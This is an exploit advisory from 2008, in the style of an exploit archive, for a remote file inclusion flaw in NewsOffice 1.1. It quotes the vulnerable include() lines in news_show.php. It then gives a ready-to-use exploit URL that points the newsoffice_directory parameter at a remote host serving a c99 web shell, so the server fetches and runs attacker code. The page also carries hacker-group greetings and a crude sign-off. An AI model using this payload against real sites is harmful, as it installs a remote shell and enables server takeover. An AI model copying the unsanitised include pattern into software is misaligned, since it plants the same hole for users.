NewsOffice 1.1 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NewsOffice 1.1 Remote File Inclusion Vulnerability
# Published : 2008-04-11
# Author : RoMaNcYxHaCkEr
# Previous Title : Picture Rating 1.0 Blind SQL Injection Exploit
# Next Title : Joomla Component joomlaXplorer <= 1.6.2 Remote Vulnerabilities

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : NewsOffice 1.1 Remote File Include Vulnerabilitiy

# Download From : http://www.newanz.com/applications/NewsOffice/?page=download

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Vulne Code In File news_show.php In Different Lines :

include($newsoffice_directory."config.php");
include($newsoffice_directory."news_data.php");
include($newsoffice_directory."template.php");

# Exploit :

http://WwW.4RxH.CoM/NewsOffice/news_show.php?newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?

Also The Version 1.0 Is Infected In Same File

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HoTMaiL.iT

# Fuck Own Life  :( 

-==========================================[ ViVa Islam + YeMeN ]====================================-

# www.Syue.com [2008-04-11]